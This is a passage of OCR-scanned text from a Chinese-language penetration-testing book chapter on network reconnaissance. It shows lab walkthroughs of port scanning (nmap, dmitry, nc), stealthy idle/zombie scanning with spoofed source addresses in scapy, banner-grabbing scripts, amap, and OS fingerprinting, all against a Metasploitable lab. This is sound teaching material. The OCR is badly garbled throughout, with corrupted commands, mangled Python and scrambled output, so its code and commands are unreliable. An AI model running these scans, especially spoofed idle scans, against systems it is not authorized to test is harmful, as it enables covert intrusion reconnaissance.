root@kali:~# nnmap -ST 192.168.I.163 
tarting Nmap 7.790 ( https://nmap.org ) at 2018-10-26 22:31 EDT 
map scan report for 192.168.1.103 
Do is Up [0.0025s latency). 

ot shown: 996 closed ports 

PORT STATE SERVICE 

1l35/tcp open msrpc 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

l2869/tcp open icslap 

MAC Address: 900:0C:29:A2:4E:07 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds 


(多 提示 : 通过 Nmap -sT -iL addrtxt -p 80 命 
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(3) dmitry 工具 。dmitry 工具 的 功能 简 
单 ， 使 用 起 来 不 用 配置 太 多 参数 ， 默 认 150 
个 常用 端口 。 使 用 dmitry 工具 进行 扫描 的 
操作 步骤 如 下 : 
输入 dmitry 命 令 ， 可 以 查看 该 工具 的 
参数 信息 ， 执 行 效果 如 下 图 所 示 。 


root@kali:-# dmitry 
Deepmagic Information Gathering Tool 
"There be some deep magic going on" 


NUsage: dmitry [-winsepfb] [-t 6-9] [-o shost.txt] host 

-0 Save output to %host .txt or to file specified by -0 file 
-i Perform a whois lookup on the IP address of a host 
Perform a whois looxup on the domain name of a host 

n Retrieve Netcraft.com information on a host 

S Perform a Search for possible subdomains 

e Perform a search for possible email addresses 

p Perform a TCP port scan on a host 

+* -Tf Perform a TCP port scan on a host showing Dutput reporting filtered ports 
* -bb Read in the banner received from the scanned port 

+ -t 08-9 Set the TTL in seconds when scanning a TCP port ( Default 2 ) 
*Requires the -p flagged to be passed 


使 用 dmitry -p 192.168.1.103 命 令 ， 实 
现 常用 150 个 端口 的 扫描 ， 如 下 图 所 示 。 


root@kali:~# dmitry -p 192.168.1.163 
Deepmagic Information Gathering Tool 
"There be some deep magic going on" 


ERROR: Unable to Locate Host Name for 192.1658.1.103 
Continuing with limited modules 
HostIP:192.168.1.103 

HostName : 


Gathered TCP Port information for 192.168.1.103 


一 一 


Port state 
L135/tcp open 
139/tcp open 


Portscan Finished: Scanned 159 ports, 147 ports were in state closed 


All scans completed, exiting 


(4) nc 工具。 nc 工具 也 有 一 个 扫描 的 
功能 ， 使 用 nc -nv -wl -z 192.168.1.103 1-1000 
命令 可 以 对 指定 端口 区 间 进 行 扫 描 ，nc 扫 
描 的 结果 除 给 出 端口 外 ， 还 给 出 了 可 能 
用 的 服务 名 称 ， 如 下 图 所 示 。 


oot@kali:-~# nc -nV -wl -Z 192.168.1.103 1-1000 
(UNKNOWN) [192.168.1.103] 445 (microsoft-ds) open 
(UNKNOWN) [192.168.1.103] 139 (netbios-ssn) open 
(UNKNOWN) [192.168.1.103] 135 (loc-srv) open 


在 扫描 命令 中 ，-nv 表 示 后 面 给 出 的 是 
一 段 IP 地 址 ， 不 做 域名 解析 ; -wl 是 设置 超 
时 时 间 1s; -z 是 进行 扫描 。 

nc 还 可 以 写成 脚本 的 形式 ， 有 具体 代码 
如 下 : 


# 循 环 取出 139-200 的 端口 进行 扫描 最 后 过 滤 出 
open 状 态 的 端口 

tor x 11 Ssegq 139 200} 75d0 nc nw —w 
-zo92 160 103 Sx done nl 


grep open 
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还 可 以 写成 扫描 IP 地 址 段 ， 具 体 代 码 
如 下 : 
# 循 环 取 出 1-254, 扫描 该 区 段 IP 指 定 端 口 


for x in Stseqg 1 254});do ne =nv 一 WwW 1 
-Zz 192.168 .1.Sx 80;done 


3. 中 间 人 扫 摘 


中 间 人 扫 摘 《也 称 为 僵尸 扫描) 扫描 
方式 极度 隐蔽 ， 但 是 实施 条 件 苛 刻 。 首 先 
扫描 方 允 许 伪造 源 地 址 ， 其 次 需要 有 一 台 
中 间 人 人 机器。 中间 人 机 器 需要 具备 如 下 两 
个 条 件 : 

第 1 条 : 在 网 络 中 是 一 个 闲置 的 状态 ， 
没有 三 层 网 络 传输 。 

第 2 条 : 系统 使 用 的 IPID 必 须 为 递增 形 
式 的 才 可 以 ,不同 的 操作 系统 IPID 是 不 同 
的 ， 如 有 的 是 随机 数 。IPID 是 IP 协 议 中 的 
Identification 字 7 段 ， 如 下 图 所 示 。 


v Internet Protocol Version 4, Src: 192.168.1.1696，Dst: 196.126.166.1965 
A108 .... = Version: 
-- B11 = Header Length: 28 bytes (5) 

» Differentiated Services Field: 9x99 (DSCP: CSO, ECN: Not-ECT) 
Total Length: 40 
lIdentification: Gx2421 {9249) 

» Flags: Bx40600, Don't fragment Ck IPID 
Time to live: 128 
Protocol: TCP (6) 
Header checksum: Ox03c1 [validation disabled] 
[Header checksum status: Unverified] 
Source: 192.168 .1.109 
Destination: 166.120.166.165 


中 间 人 扫描 实现 的 原理 ， 如 果 需 要 分 
解 成 步 又， 可 以 分 为 如 下 几 个 步骤 : 
扫描 者 向 中 间 人 机 器 发 送 一 个 SYN/ 
ACK 数 据 包 ， 此 时 中 间 人 机 器 会 回复 一 个 
RST 数 据 包 。 这 个 RST 数 据 包 中 便 包 含 IPID 
值 ， 记 录 IPID 值 。 
扫描 者 向 目标 主机 发 送 SYN 数 据 包 。 
此 时 SYN 中 的 源 地 址 为 伪造 地 址 (中 间 人 
机 器 地 址 ) ， 如 果 目 标 主机 端口 开放 便 会 
向 中 间 人 机 器 发 送 SYN/ACK 数 据 包 ， 中 间 
人 机 器 会 给 目标 机 回复 RST 数 据 包 ， 此 时 
IPID+1 进 行 递 增 。 

如 果 目 标 主机 端口 没有 开放 ， 目 标 主 
机 会 给 中 间 人 机 器 发 送 RST 数 据 包 ， 中 间 人 
不 予 回 应 ，IPID 保 持 不 变 。 
扫描 者 再 次 向 中 间 人 机 器 发 送 SYN/ 
ACK 数 据 包 ， 等 待 回复 RST 数 据 包 以 获取 
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IPID 值 。 拿 到 这 个 IPID 值 进行 比 对 ， 如 果 
IPID 值 为 IPID+2， 则 证 明 目 标 主机 端口 开 
放 ， 否 则 目标 主机 端口 未 开放 。 

(1) scapy 工具 。 使 用 scapy 实现 中 间 
人 扫描 。 首 先 需 要 对 中 间 人 主机 检验 ， 有 具 
体操 作 步 骤 如 下 : 
构建 发 送 给 中 间 人 的 数据 包 ， 如 下 图 
所 示 。 
>>> i=IP() 
>>> ft=TCP( ) 
>>> rm=(i/t) 
>>> rm[IP].dst = "192.168.1.103" 
>>> rm[TCP].fLags = 'S' 
>>> Srl(rm).display() 
Begin emission: 


.Finished sending 1 packets. 
米 


Received 2 packets, got 1 answers, remaining 0 packets 


查看 返回 数据 包 中 的 IPID 值 ， 如 下 图 


所 示 。 

凑 ####[ IP ] 大 ## ###[ TCP ]### 
version= 4 sport= http 
ihl= 5 dport= ftp data 
tos= Ox0 IPID 5eg= 0 

en 三 46 ack= 1 
dataofs= 5 

ags= reserved= 0 
frag= 0 flags= RA 
ttl= 128 window= 0 
proto= tcp chksum= QOx2b4Tf 
chksum= Qxa556 urgptr= 0 
src= 192.168.1.103 options= [] 
dst= 192.168.1.101 ###[ Padding ]### 
\options\ load= ' FHEPF 


再 次 发 送 相 同 数据 包 给 中 间 人 机 器 ， 
查看 数据 包 中 IPID 值 ， 如 下 图 所 示 。 如 果 
此 时 IPID 值 为 递增 ， 并且 两 个 数据 包 前 后 
数值 差 1， 这 个 中 间 人 机 器 才 符 合 扫描 要 
求 ， 否 则 无 法 判断 。 


靡 ##[ ”IP ]##### ###[ TCP J]### 
version= 4 sport= http 
ihl= 5 dport= ftp data 
tos= Ox0 IPID seq= 0 
len= 40 ack= 1 
dataofs= 5 

ag5s= reserved= 0 
frag= 0 flags= RA 
ttl= 128 window= 0 
proto= tcp chksum= Ox2b4Tf 
chksum= QOxa555 urgptr= 0 
src= 192 .168.1.103 options= |[ 
dst= 192.168.1.101  ##[ Padding ]### 
\options\ load= '\x02\x04\x05\xb4\x01\x03 


有 了 中 间 人 机 器 后 便 可 以 实施 扫描 ， 
具体 操作 步骤 如 下 : 
构建 发 送 给 目标 机 的 数据 包 ， 如 下 图 
所 示 。 这 里 使 用 send 发 送 不 查看 返回 数据 ， 
目标 地 址 是 要 扫描 的 主机 地 址 ， 源 地 址 需 
要 设置 成 中 间 人 地 址 。 


>>> i=IP() 

>>> t=TCP!() 

>>> rd=(1i/t) 

>>> rd[IP].dst hp Py PP 
>>> rd[IP].src "192.168.1.103" 
>>> rd[TCP] .flags = 'S' 


先 给 中 间 人 机 器 发 送 一 个 SYN 数 据 
包 ， 记 录 下 IPID 值 ， 如 下 图 所 示 。 接 着 使 
用 send(rd) 命 令 ， 将 数据 包 发 送出 去 ， 使 用 
send 发 送 不 查看 返回 数据 。 


>>> Srl(rm).display() 

Begin emission: 

Finished sending 1 packets. 
六 

Received 1 packets, got 1 answers, remaining 9 packets 
####[ IP ]### 姑姑 [ TCP ]#### 


version= 4 sport= http 
ihl= 5 dport= ftp data 
tos= QOx0 segq= 0 

len= 40 ack= 1 

id= 4476 dataofs= 5 
flags= reserved= 0 
frag= 0 flags= RA 

ttl= 128 window= 0 
proto= tcp chksum= Ox2b4Tf 
chksum= Qxa537 urgptr= 0 

src= 192.168.1.103 options= [] 


### 大 [ Padding ]### 
Load= '\xX0l1\x01\x0O8\n\xXO0\x00' 


dst= 192 .168 .1.161 
\options\ 


再 次 快速 给 中 间 人 机 器 发 送 一 个 SYN 
数据 包 ， 查 看 IPID 值 ， 如 下 图 所 示 。 通 过 
比较 两 个 IPID 值 ， 如 果 相 差 为 2， 证 明 目 标 
主机 端口 开放 。 


>>> Srl(rm).display() 

Begin emission: 

Finished sending 1 packets. 
水 

Received 1 packets, got 1 answers, remaining 9 packets 
少 # 姑 [。 工 PP ] ##### 开 # 姑 [ TCP ]### 


version= 4 sport= http 
ihl= 5 dport= ftp data 
tos= OxO seg= 0 

len= 40 ack= 1 

id= 4478 dataofs= 5 
flags= reserved= 0 
frag= 0 flags= RA 

ttl= 128 window= 0 
proto= tcp chksum= Ox2b4f 
chksum= Qxa535 urgptr= 0 

src= 192.168.1.103 options= [| 


#####[ Padding ]### 
load= '\x00\x00 DBD， 


dst= 192.168.1.101 
\options\ 


下 面 给 出 一 段 自动 化 测试 代码 ， 具 体 
代码 如 下 : 


#!/usr/bin/python 
import logging 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
# 定 义 一 个 函数 用 于 测试 中 间 人 主机 是 否 合格 
def ipid (mid): 
replyl = srl(IP(dst = mid)/TCP (flags = 
'S') ,timeout=2,verbose=0) # 发 送 SYN 数 据 包 
send(IP(dst = mid)/TCP (flags="'SA'), 
# 发 送 SYN/ACK 数 据 包 


verbose=0) 


第 11 章 ”扫描 无 线 网 络 中 的 主机 


reply2 = srl(IP(dst = mid) /TCP (flags = 
'S') ,timeout=2,verbose=0)# 再 次 发 送 SYN 数 据 包 
if reply2[1IP].id == (replyll[IP]. 
EAT2] # 判 断 两 次 SYN 数 据 包 返回 包 是 否 差 值 为 2 
print "IPID meet a criterion" 
# 如 果 差 值 为 2, 符合 要 求 ,询问 是 否 扫描 
TeESponse = raw vnputl skarct 
Seannangy (rT or my 
if response == "Y": 
# 输 入 Y 进 入 扫描 ， 需 输入 一 个 目标 机 IP 地 址 
target = raw input ("Enter the IP 
Destination host address: ") 
midscan (target,mid) # 调 用 扫描 函数 
else: # 不 符合 要 求 做 出 提示 
print"Does not meet the requirements,cannot 
be used as an intermediary machine" 
# 定 义 用 于 扫描 的 函数 
def midscan (target,mid): 
print "\nScanning target" + target 
+ "with mid" + mid # 打 印 出 一 些 提示 信息 
DE Open Ports on 


for port in range (100.200}): 
# 循 环 遍 历 100-200 的 端口 
| # 给 中 间 人 发 送 一 个 数据 包 
start val = srl(IP(dst=mid}/TCP 但 
ags="SA',dport=port),timeout=2, verbose=0) 
# 给 目标 机 发 送 一 个 伪造 数据 包 
send(IP(src=mid,dst=target) /TCP( 
flags="S",dport=port),verbose=0) 
# 再 给 中 间 人 发 送 数 据 包 
end val = srl(IP(dst=mid) /TCP (fla 
gs="SA'),timeout=2,vVverbose=0) 
if end valllP].id == 
val[IP]+2) :  # 判 断 两 次 IPID 值 是 否 为 2 
prime nort # 符 合 要 求 打印 出 端口 


三 三国 = 


(startl 


# 不 符合 要 求 直接 pass 


pass 


Drint tt Identaty Mid Hostun’ 

print”2 = perftorm Mid Scan\in” 

ans = raw input ("Select an Option (1 
1 


if ans == '1': # 选 项 1 测试 中 间 人 机 器 ， 输 
入 一 个 IP 地 址 
mid = raw input ("Enter IP address 


to test IPID sequence: ") 


ipid(mid)  ## 调 用 中 间 人 测试 函数 

else: 

if ans == '2':  # 选 项 2 直接 扫描 ， 输 入 中 
间 人 IP 地 址 以 及 扫描 主机 IP 地 址 


mid = raw input ("Enter IP adderss 
for Mid System: ") 
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target = raw input ("Enter IP adderss 
For Sean argek= |] 


# 调 用 扫描 函数 


(2) Nmap 工具 。Namp 工具 提供 了 中 
间 人 这 种 扫描 方式 ， 当 然 前 提 是 中 间 人 机 
器 符合 要 求 ， 再 进行 扫描 。 有 共 体 操作 步骤 
如 下 : 
[step 回 使 用 Nmap -p139 192.168.1.103 
-ScIipt=ipidseq.nse 人 命令， 检验 中 间 人 机 
器 是 否 符 合 要 求 ， 如 下 图 所 示 。 它 的 
判断 依据 仍然 是 IPID 是 不 是 一 个 增 量 
(Incremental) 。 


midscan (target, mid) 


root@kali:~/Test/port# nmap -pl39 192.168.1.103 -script=ipidseq.nse 
Starting Nmap 7.79 ( https://nmap.org ) at 2018-10-27 92:52 EDT 
Nmap scan report for 192.168,1.103 

Host is up (9.00636s Latency | . 


PDRT STATE SERVICE 
139/tcp open netbios-ssn 
MAC Address: 90:69C:29:A2:4E:07 (VMware) 


Host script results: 
|_ipidseq: Incremental! 


Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds 


[step 图 使 用 Nmap 192.168.1.1 -sI 192. 
168.1.104 -Pn -p 1-100 命 令 进 行 中 间 人 扫 
描 ， 第 一 个 IP 是 需要 扫描 的 目标 机 器 ， 第 二 
个 IP 是 中 间 人 主机 ，-sI 指 定 的 参数 便 是 中 
间 人 ， 如 下 图 所 示 。 


root@kali:~/Test/port# nmap 192.168.1.1 -ST 192.168.1.164 -Pn -p 1-166 
starting Nmap 7.79 ( https://nmap.org ) at 2018-19-27 63:97 EDT 

Idle scan using zombie 192.168.1.104 (192.166.1.104;:80); ClLass: Incremental 
Nmap scan report for 192.168,1.1 

Host is up (0.028s latency). 

Not shown: 99 closed|filtered ports 

PORT STATE SERVICE 

B80/tcp open http 

MAC Address: 1lC:FA:68:81:2F:08 [Tp-link Technologies) 


Nmap done: 1 IP address [1 host yup) scanned in 2.24 seconds 


11.2 扫描 主机 其 他 信息 


通过 端口 扫描 确定 端口 后 ， 根 据 不 同 
端口 判断 目标 主机 可 能 存在 哪些 服务 ， 从 
而 识别 目标 操作 系统 ， 为 后 续 的 防范 工作 
做 准备 。 


11.2.1 扫描 banner 信 息 


通过 banner 信 息 可 以 识别 目标 主机 的 软 
件 开发 商 、 软 件 名 称 、 服 务 类 型 、 版 本 号 
等 信息 。 不 过 ， 这 个 banner 信 息 可 修改 ， 因 
此 识别 并 不 是 很 准确 ， 获 取 banner 信 息 必须 
要 与 目标 主机 建立 连接 。 
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1. python 脚 本 


使 用 python 脚 本 获取 banner 信 息 ， 上 有 具体 
代码 如 下 : 
import socket # 导 入 一 个 用 于 网 络 编程 的 库 


Danner=socket SorckeL(lgocket AE 
INET, socket .SOCK STRERAM) # 创 建 连接 

banner.connect(("192.168.1.105",21)) 
# 使 用 connect 建 立 关 联 

banner.recv (1024)# 使 用 recv 函 数 接收 数据 

2220 (veoFTPd 2.3-.4) Nr\Dn 

# 返 回 的 banner 信 息 

banner .close()# 使 用 完 对 象 后 记得 关闭 

exit () # 退 出 python 环 境 


运行 脚本 执行 效果 ， 如 下 图 所 示 。 
root@kali:~/Test/port# python 
Python 2.7.15+ (default, Aug 31 2618，11:56:52) 


[GCC 8.2.8] on linux2 
Type "help", "copyright", "credits" or "license" for more information, 
p>> import socket 

p>> banner=socket.socket(socket.AF INET,Socket .SOCK STREAM) 
p>> banner.connect(("192.168.1.165" ,21)) 

p>> banner.recyv|1024) 

'228 (VvSFTPd 2.3,4)\r\n' 

p>> banner.closel) 

b>> exit() 


在 实际 环境 中 很 多 机 器 是 不 允许 获取 
banner 信 息 的 ， 如 果 是 这 样 ，recv 函 数 会 
被 挂 起， 一 直 等 竺 返回。 下面 给 出 一 段 脚 
本 ， 可 以 避免 recv 图 数 被 挂 起 ， 具 体 代 码 
如 下 : 


#!1/usr/bin/python#python 有 和 脚本 默认 格式 
import socket # 导 入 socket 库 
import select # 导 入 select 库 
# 导 入 sys 库 
if len(sys.argv) !=4 : 
# 判 断 输 入 参数 如 果 不 等 于 4, 打印 出 提示 信息 
print "Usage banmer gredqb py 
[Target IP] [First Port] [Last Port]" 
print "Example /banner greab py 
L000 DO 
print "Example will grab banners for 
TEP poOrts L100 Throogh 200 om 192. 169851 1" 
SYS .exit () 


import sys 


ip = sys.argv[1] # 获 取 IP 地 址 
start = int (sys.argv[2])# 获 取 起 始 端口 号 
end = int (sys.argv[3]) # 获 取 结 束 端口 号 
for port in range (start, end): 
# 循 环 获取 端口 
try: “ # 创 建 TCP 连 接 
bangrab = socket.socket (socket. 
AF INET, SOCket .SOCK STREAM) 
bangrab .Connect ( (ip, port)) 
# 以 相应 的 端口 建立 连接 


ready = Select-select([bangrab | ， 


[],，[],1) # 获 取 返 回信 息 ， 超 时 时 间 1s 


if ready[0]: 
# 如 果 返 回信 息 不 为 空 ,将 信息 打印 
BriINIE TEPoPorteE Fretemartl 
+"."+bangrab.recv(1024) 
bangrab .close () 
一 


# 关 闭 对 象 
# 如 果 超 时 ,就 继续 下 一 个 端口 
执行 脚本 效果 如 下 图 所 示 。 


Foot@kali:~/Test/Service# ./ban grab.py 192.168.1.105 1 500 
TCP Port21.220 (vsFTPd 2.3.4) 


pass 


TCP Port22.5SH-2.9-0penSSH 4.7p1 Debian-8ubuntul 


TCP Port23.0000 O06#00' 
TCP Port25.220 metasploitable.localdomain ESMTP Postfix (Ubuntu 


2. dmitry 工 具 


使 用 dmitry 工 具 可 以 获取 banner 信 息 ， 
执行 dmitry -pb 192.168.1.105 命 令 ， 即 可 获 
取 banner 信 息 ， 如 下 图 所 示 。 


pathnered TCP Port InformatIon ToOr 192.168.1.195 


-7 


Port state 

21/tcp ope 

P> 220 (vsFTPd 2.3. 4) 

p2/tcp open 

>> SSH-2.0-0OpenSSH 4.7pl1 Debian-8ubuntul 
R23/tcp 

>> bbb Vu#d' 

p25/tcp open 


p> 229 metasploitable.localdomain ESMTP Postfix (Ubuntu) 


53/tcp open 


Portscan Finished: Scanned 150 ports, 144 ports were in state closed 


3. Nmap 工 具 


Nmap 工 具 提 供 了 很 多 已 经 写 好 的 脚 
本 ， 从 而 进行 banner 信 息 的 扫描 ， 具 体操 作 
步骤 如 下 : 
执行 Nmap -sT 192.168.1.105 -p22- 
-script=banner.nse 命 令 ， 可 以 获取 目标 主 
机 22 端 口 的 banner 人 信息， 执行 效果 如 下 图 
所 示 。 


re nmap -sT 192.165.1.1905 -p22 --script=banner.nse 
tarting Nmap 7.70 ( https://nmap.org ) at 2018-10-27 05:21 EDT 


Nmap scan report for 192.168.1.105 
Host is up (6.000435 latency). 


PORT STATE SERVICE 

2/tcp open ssh 

|_banner: SSH-2.9-0penSSH 4.7pl1 Debian-8ubuntul 
NMAC Address: 99:9C5:29:FA:DD:2A (VMware) 


Nmap done: 1 IP address (1 host Up) scanned in 6G.46 seconds 


使 用 Nmap 192.168.1.105 -p 1-100 -sV 
命令 ，-sV 参 数 表明 使 用 特征 扫描 ， 基 于 特 
征 扫 描 会 显示 出 更 多 的 信息 ， 执 行 效果 如 
下 图 所 示 。 
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rooterali:-/Test/Seryices hmap 192.,155,1,165 -p 1-165 - 

Starting Nmap 7.76 ( https: Es org ) at 2018- 19-27 65: " EDT 
ap scan report tor 192.168. 

ost is up (98.968215 tn 

ot Shown:; 94 closed ports 

IPORT STATE SERVICE VERSION 

217LCP Open futp VsfTLpd 2.3.4 

RR2/tcp open ssh OpenssH 4.7p1 Debian aubuntul (protocol 2.6) 
23/tcp open telnet Linux telnetd 

25/tcp opcn smtp Postfix smtpd 

[53/tcp open domain ISC BIND 9.1.2 

Be/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 

MAC Address: OB:AC:29:FA:DD:2A (VMware) 

ServirP Tnfo: Hnst: metasploitabie.lncaldomain: OSs: Unix, linux: CPFE: cpe:/o:1inux:1inux kernel 


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Naap done: 1 IP address (1 host up) scanned in 6.94 seconds 


(多 提示 : 通过 banner 信 息 可 以 获取 端口 对 
应 什么 服务 ， 该 信息 量 少 而 且 不 够 准确 ， 
而 使 用 Nmap 工 具 提 供 的 特征 扫描 ， 可 以 扫 
描 出 更 多 的 信息 。 


4. amap 工 具 


amap 是 首 款 针对 渗透 测试 人 员 的 扫描 
工具 ， 它 会 识别 在 端口 上 运行 的 应 用 程序 ， 
还 可 以 通过 发 送 触 发 数据 包 并 在 啊 应 字符 串 
列表 中 查找 响应 ， 来 识别 基于 非 ASCII 编 码 
的 应 用 程序 。 使 用 语法 格式 如 下 : 
Be 0 


min, max] [-n connections] [-N delayl] 
[-w delay] [-e] [-v] TARGET PORT 


使 用 amap 工 具 进 行 扫 描 的 操作 步 又 
如 下 : 
使 用 amap -b 192.168.1.105 22 命 令 ， 
可 以 获取 banner 信 息 ， 如 下 图 所 示 。 


root@kali:~/Test/Service# amap -b 192.168.1.105 22 
amap V5.4 (www.thc.org/thc-anap) started at 2018-10-27 05:31:5 
3 - APPLICATION MAPPING mode 


amapcrap 


protocol on 192.168.1.105:22/tcp matches ssh - banner: SSH-2.0 
-OpenSsSH 4.7pl1 Debian-8ubuntul\nProtocol mismatch.\n 
protocol on 192.168.1.105:22/tcp matches ssh-openssh - banner: 


SSH-2.0-0penSSH 4.7pl1 Debian-8ubuntul\nProtocol mismatch.\n 


Jnidentified ports: none. 


at 2018-10-27 05:32:04 


和 阁 提 示 : 使 用 amap -b 192.168.1.105 1-100 
命令 ， 可 以 扫描 区 段 端口 。 


amap 提 供 了 基于 特征 的 扫描 ， 直 接 使 
om 192.168.1.105 1-100-q 命 令 ， 可 以 进 

行 基 于 特征 的 扫描， 并 给 出 比较 详细 的 信 
二 


roote@kali:~/Test/Service# amap I52.165.I.1I65 1-166 -9q 
Bmap V5.4 (www.thc.org/thc-anap) started at 2018-19-27 65:53:29 - APPLICATION MAPPING mode 


Protocol on 192.168.1.185:88/tcp matches http 
Protocol on 192.168,1,165:;21/tcp matches ftp 
rotocol on 192.168.1.165:22/tcp matches ssh 
Protecot on 192.168.1.165:22/tCcp matches ssh-openssh 
rotocol on 192.168.1.165:86/tcp matches http-apache-2 
Protocol on 192.168.1.165:23/tcp matches telnet 


Protocol on 192.168,1,165;25/tcp matches smtp 
Protocol on 192.168,1.165;:53/tYCpP matches dns 
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在 基于 特征 扫描 的 过 程 中 ， 如 果 加 入 
b 参 数 ， 会 使 扫描 结果 更 加 精确 ， 扫 描 结 果 
如 下 图 所 示 。 


Foot@kali:;~/Test/Service# amap 192.166.1,195 1-199 -qb 
pmap vy5,.4 (www,thc.orgrthc-amap) started at 2618-18-27 86:00:;83 - APPLICATION MAPPING mode 


Protocol on 192.1668.1.185:;2l/tcp matches Ttp - banner; 22B (VSFTPd 2.3.4)\r\n539 Please login 
with USER and PASS,\r\n 

rotocol on 192, Es 195 : mse a http - banner; HTTP/1.,1 299 OK\r\nDate Sat, a Oct 2 
13 0995964 GMT\r\n (Ubuntuj DAV/2\r\nX-Powered-By pHPp/75,2.4-2ubun "19\r\ 
nContent -Length ees se ye epee -Type pre tet pp html><head te 
tasploitable2 - Linux</title>< 

otocol on 192.168.1.165:86/tcp matches http-apache-2 - banner: HTTP/1.1 288 OK\r\nDate Sat, 
27 Qct 2918 995994 GMT\r\nServer hpache/2.2.8 (Ubuntuyu) DAV/2\r\nX-Powered-By PHP/5.2.,4-2ubun 
Ku5.1a\r\nContent-Length 891\r\nCon rp close\r\nConternt-Type text/html\r\n\r\nchtml><head 
p<title>Metasploitable2 - Linux</ti 

Protocol on 192,165,1,195;:22/tcp se ssh - banner; S55H-2,0-0penSsSH 4,7p1 Debian-8ubuntulv 


pr sir on 192.168.1.185:22/tcp matche sh-openssh - ba 
bbyur 

pap on 192, Ns 1,185:;25/tcp matches smtp - banner; 220 metasploitable,localdomain ESMTP 
Postfix (Ubuntu)\r\ 

Protocol on 192 本 1,195:23/tcp matches telnet - ban 坟 ' 

Protocol on 192,168,1,195:;25/tcp ei nntp - Domes i g metasploitable,localdomain ESMTP 
Postfix (Ubuntu)N\rvn562 5.5.2 Error command not recognized\r\n 

protocol on 192.165.1,195:53/tfcp matches dns - banner: 


er: SSH-2.6-0penSsSsH 4.7p1 Debia 


11.2.2 ”探索 主机 操作 系统 


操作 系统 安装 完成 后 总 会 默认 打开 一 
些 问 口 ， 针 对 这 些 默 认 端 口 可 以 判断 出 一 
个 系统 的 类 型 ， 当 然 操 作 系统 的 识别 种 类 
每 多， 更 多 的 是 采用 多 种 技术 组 合 比较 来 
进行 确认 。 


1. 主动 式 扫 搞 的 一 些 方 ; 


首先 通过 主动 扫描 收集 信息 ， 然 后 将 
收集 的 信息 进行 特征 比 对 ， 由 此 推断 出 操 
作 系 统 类 型 的 方式 。 

(1) python 工具 。 基 于 TIL 值 进行 扫 
描 的 方式 ， 根 据 不 同 操作 系统 TIL 值 不 同 
的 特征 来 进行 判断 。Windows 默认 TTL 值 
是 128 (65 一 128) ，Linux/Unix 默认 TTL 
值 是 64 (1 一 64) ， 也 有 某 些 Unix 默认 
TTL 值 是 255。 基 于 TIL 值 进行 判断 的 脚 
本 ， 具 体内 容 如 下 : 


#!/usr/bin/python 

from scapy.all import* 

import logging 

logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 

import sys 

if lenl(sys.argv) !=2: 
Sa rs SEE 
网 


print "Usage 

print "Example 
ES 

print "Example will perform 七 1] 
analysis to attempt to determine wheter 
the system is windows or Linux/Unix " 

SYS .exit() 


ip=sys.argv[1]  # 获 取 IP 地 址 
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ans—sriltIip(ldst= strIip)hiICNEl]. 
timeout=1,Verbose=0)# 发 送 ICMP 数 据 包 
if ans == None:# 如 果 没 有 回复 信息 ,做 出 提示 
print "NO response was returned " 
elif int(ans[IP].ttl)<=64:# 如 果 TTIL 值 
小 于 64, 提 示 Linux/Unix 系 统 
print "Hoste 153 Lin Unia” 
# 都 不 是 提示 Windows 系 统 


print "Host is Windows” 
使 用 python 脚 本 识别 系统 ， 执 行 脚 本 两 


次 ， 分 别 扫描 Linux 系 统 与 Windows 系 统 ， 
执行 效果 如 下 图 所 示 。 


root@kali:~/Test/Service# 
ost is Linux/Unix 
root@kali:~/Test/Service# 


else: 


./ttl os.py 192.168.1.10 


./ttl os.py 192.168.1.10 


(2) Nmap 工具 。 使 用 Nmap 工具 来 判 
呆 操 作 系 统 ， 具 体操 作 步 骤 如 下 : 


使 用 Nmap 192.168.1.103 -O 命 令 来 进 
行 扫描 ， 扫描 Windows 操 作 系 统 ， 并 且 给 出 
3 以 下 参考 信息 》 如 下 图 所 示 。 


FootEKaTUE:-7TesEI7SeGF es# nmap I97.165.1-.1653 -TU 
Starting Nmap 7.76 人 te :ynmap.org ) at 2618-16-27 06:35 EDT 
map gt report for es a 1.103 
s Up (68.696655 ncy) . 
her i 996 pp phe 
RT dg ee 


135/tcp 
139/ TCp op nerblos SSn 
oft-ds 


g69/tcp op sla 
C Address: o0:0C:29: A2:4E:07 [VMware ) 
ev Ht Nye pe 本 了 
ng: ne “2000|xp|2003 
hs "CpE! cpe: 10; Cr window; 2696 ; DS oe /90: ae pata Windows 2999;;5p3 cpe:;/0:; tp eer 
5 -2000: sp4 ee DER cpe:/0:mic 本 t:windows_xp: :sp3 cpe:/o oi 
aft wind ar 7 ft:wind 


:/ KR ruar aoa pe 
DS ,deralls: crosof nd 2z969 SP2 » 5P4，Windows XP sp2 下 sp3。 or Windows Server 2663 ee " SPZ 
Netw 


NS pate EE pe reporT ee etd 后 7 at https;//nmap,.org/Subnit/ ， 
Nmap done: 1 IP address (1 1h up) 5 in 2. 


使 用 Nmap 打 描 Linux 系 统 的 信息 ， 执 
行 效果 如 下 图 所 示 。 


oot@kali:-/Test/Service# nmap 192.165.1.195 -0 

tarting Nmap 7.76 ( https://nmap.org ) at 2618-18-27 66:38 EDT 
map scan report for 192.168.1.195 

ost 15 Up (8.08066s latency). 

ot shown: 977 closed ports 

ORT STATE SERVICE 

/tcp open ftp 

2/tcp open ssh 

3/tcp open telnet 

Stcp open smtp 


op n 
AC Address: 60:6C:29:FA:DD:2A [VMware) 
pet type: ee purpose 


D5 CPE: ee pp En mu ee Fa 
DS details: Linux 2.6,9 - 6.33 
Network Distance: 1 hop 


DS detection performed. Please report any incorrect results at https://nmap.org/submit/ 
Nmap done: 1 IP address [1 host up) scanned in 2.98 seconds 


侈 提示 : 从 扫描 出 的 信息 中 可 以 看 到 Nmap 
是 基于 CPE 信 息 来 判断 操作 系统 的 版 本 ， 
CPE 是 一 个 国际 化 、 标 准 化 组 织 ， 不 论 是 软 
件 还 硬件 ， 通 过 CPE 分 配 一 个 编号 ， 因 此 通 
过 CPE 编 号 可 以 匹配 系统 类 型 。 


(3) xprobe2 工具 。xprobe2 是 一 个 针 
对 操作 系统 的 扫 拉 工具， 扫描 的 结果 并 


不 是 很 准确 ， 仅 供 参 考 。 具 体操 作 步 骤 
如 下 : 
使 用 xprobe2 192.168.1.103 命 令 ， 
扫描 Windows 操 作 系 统 ， 执 行 效果 如 下 图 
所 示 。 


rootekati:-#xprobe2z 192.168.1.193 


